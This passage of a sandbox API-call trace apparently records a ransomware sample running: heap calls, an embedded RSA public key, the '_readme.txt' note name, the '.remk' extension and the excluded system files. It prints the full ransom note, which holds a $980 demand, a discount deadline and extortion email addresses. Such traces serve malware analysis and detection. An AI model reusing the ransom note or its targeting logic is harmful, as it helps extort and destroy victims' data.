KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0108.134] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a2ff8 | out: hHeap=0x730000) returned 1 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x60) returned 0x333f0d8 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x28) returned 0x3390be0 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339ed90 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339eff8 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339f260 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339f4c8 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339f730 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339f998 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339fc00 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339fe68 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a00d0 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a0338 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x816) returned 0x33a2600 [0108.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33a2600, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33a2e20 [0108.134] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a2600 | out: hHeap=0x730000) returned 1 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x28) returned 0x3391510 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a05a0 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a0808 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a0a70 [0108.134] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a0cd8 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a0f40 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a11a8 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a1410 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a1678 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a18e0 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a1b48 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xa0) returned 0x33466b8 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x130) returned 0x33a2078 [0108.135] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33466b8 | out: hHeap=0x730000) returned 1 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x1d0) returned 0x33a2600 [0108.135] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a2078 | out: hHeap=0x730000) returned 1 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x2b7) returned 0x33a27d8 [0108.135] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a2600 | out: hHeap=0x730000) returned 1 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x412) returned 0x33a3648 [0108.135] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a27d8 | out: hHeap=0x730000) returned 1 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x61a) returned 0x33a2600 [0108.135] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a3648 | out: hHeap=0x730000) returned 1 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x440) returned 0x33a3648 [0108.135] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x1064) returned 0x33a3a90 [0108.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33a3648, cbMultiByte=-1, lpWideCharStr=0x33a3a90, cchWideChar=2098 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned 1075 [0108.136] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x1070) returned 0x33a4b00 [0108.136] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a3a90 | out: hHeap=0x730000) returned 1 [0108.136] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a3648 | out: hHeap=0x730000) returned 1 [0108.136] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x28) returned 0x33914e0 [0108.136] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a5b90 [0108.136] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a5df8 [0108.136] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a6060 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a62c8 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a6530 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a6798 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a6a00 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a6c68 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a6ed0 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a7138 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x80a) returned 0x33a3648 [0108.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33a3648, cchWideChar=1029 | out: lpWideCharStr=".remk") returned 6 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x33a3e60 [0108.137] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a3648 | out: hHeap=0x730000) returned 1 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x3393bb0 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382d08 [0108.137] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3313f58 | out: hHeap=0x730000) returned 1 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x50) returned 0x336a438 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x48) returned 0x3389790 [0108.137] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382d08 | out: hHeap=0x730000) returned 1 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x60) returned 0x333f348 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x60) returned 0x333f210 [0108.137] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3389790 | out: hHeap=0x730000) returned 1 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x3398528 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x90) returned 0x33786e0 [0108.137] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x333f210 | out: hHeap=0x730000) returned 1 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x50) returned 0x336a1d0 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x50) returned 0x3369f10 [0108.137] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xd8) returned 0x819820 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33786e0 | out: hHeap=0x730000) returned 1 [0108.138] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x3398570 [0108.138] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x3393c00 [0108.138] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x50) returned 0x3369e60 [0108.138] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x138) returned 0x33a2078 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x819820 | out: hHeap=0x730000) returned 1 [0108.138] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x60) returned 0x333f210 [0108.138] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x33985b8 [0108.138] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x50) returned 0x3369d58 [0108.138] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x50) returned 0x3369ca8 [0108.138] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x1c8) returned 0x3395ad0 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a2078 | out: hHeap=0x730000) returned 1 [0108.138] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x3398600 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3378ff0 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3393bb0 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x336a438 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x333f348 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3398528 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x336a1d0 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3369f10 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3398570 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3393c00 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3369e60 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x333f210 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33985b8 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3369d58 | out: hHeap=0x730000) returned 1 [0108.138] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3369ca8 | out: hHeap=0x730000) returned 1 [0108.139] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3398600 | out: hHeap=0x730000) returned 1 [0108.139] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3395ad0 | out: hHeap=0x730000) returned 1 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x28) returned 0x3391540 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a73a0 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a7608 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a7870 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a7ad8 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a7d40 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a7fa8 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a8210 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a8478 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a86e0 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33a8948 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xa0) returned 0x33466b8 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x130) returned 0x33a2078 [0108.139] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33466b8 | out: hHeap=0x730000) returned 1 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x1d0) returned 0x33a2c28 [0108.139] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a2078 | out: hHeap=0x730000) returned 1 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x2b7) returned 0x33a9b78 [0108.139] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a2c28 | out: hHeap=0x730000) returned 1 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x412) returned 0x33a4678 [0108.139] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a9b78 | out: hHeap=0x730000) returned 1 [0108.139] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x61a) returned 0x33a3648 [0108.139] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a4678 | out: hHeap=0x730000) returned 1 [0108.139] GetUserNameW (in: lpBuffer=0x18d4a8, pcbBuffer=0x18d31c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d31c) returned 1 [0108.175] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x590) returned 0x33b83b8 [0108.175] GetLastError () returned 0x0 [0108.185] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.185] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.185] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x81e) returned 0x33ba270 [0108.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33ba270, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG1") returned 16 [0108.185] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33baa98 [0108.186] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33ba270 | out: hHeap=0x730000) returned 1 [0108.186] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.186] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3315558 | out: hHeap=0x730000) returned 1 [0108.186] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f38 [0108.186] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.186] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.186] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f38 | out: hHeap=0x730000) returned 1 [0108.186] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x81e) returned 0x33ba270 [0108.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33ba270, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG2") returned 16 [0108.186] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33bb2c0 [0108.186] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33ba270 | out: hHeap=0x730000) returned 1 [0108.186] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x48) returned 0x334dce0 [0108.186] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.186] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.186] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.186] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.186] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.186] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x814) returned 0x33b9228 [0108.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1034 | out: lpWideCharStr="ntuser.pol") returned 11 [0108.187] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33ba270 [0108.187] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.187] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x60) returned 0x333f480 [0108.187] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x334dce0 | out: hHeap=0x730000) returned 1 [0108.187] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.187] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.187] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.187] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.187] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x808) returned 0x33b9228 [0108.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1028 | out: lpWideCharStr=".sys") returned 5 [0108.187] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x33bbae8 [0108.187] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.187] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x90) returned 0x7961a0 [0108.187] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x333f480 | out: hHeap=0x730000) returned 1 [0108.187] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.188] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.188] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.188] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.188] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x808) returned 0x33b9228 [0108.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1028 | out: lpWideCharStr=".ini") returned 5 [0108.188] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x33bc300 [0108.188] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.188] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.188] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.188] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.188] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.188] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x808) returned 0x33b9228 [0108.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1028 | out: lpWideCharStr=".DLL") returned 5 [0108.188] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x33bcb18 [0108.188] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.188] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xd8) returned 0x8199e0 [0108.189] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x7961a0 | out: hHeap=0x730000) returned 1 [0108.189] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.189] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.189] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.189] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.189] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x808) returned 0x33b9228 [0108.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1028 | out: lpWideCharStr=".dll") returned 5 [0108.189] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x33bd330 [0108.189] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.189] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.189] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.189] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.189] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.189] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x808) returned 0x33b9228 [0108.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1028 | out: lpWideCharStr=".blf") returned 5 [0108.189] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x33bdb48 [0108.190] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.190] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.190] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.190] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.190] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.190] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x808) returned 0x33b9228 [0108.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1028 | out: lpWideCharStr=".bat") returned 5 [0108.190] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x33be360 [0108.190] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.190] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x138) returned 0x33a3c70 [0108.190] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x8199e0 | out: hHeap=0x730000) returned 1 [0108.190] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.190] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.190] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.190] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.190] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x808) returned 0x33b9228 [0108.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1028 | out: lpWideCharStr=".lnk") returned 5 [0108.190] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x33beb78 [0108.191] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.191] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.191] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.191] HeapFree (in: hHeap=0x730000, 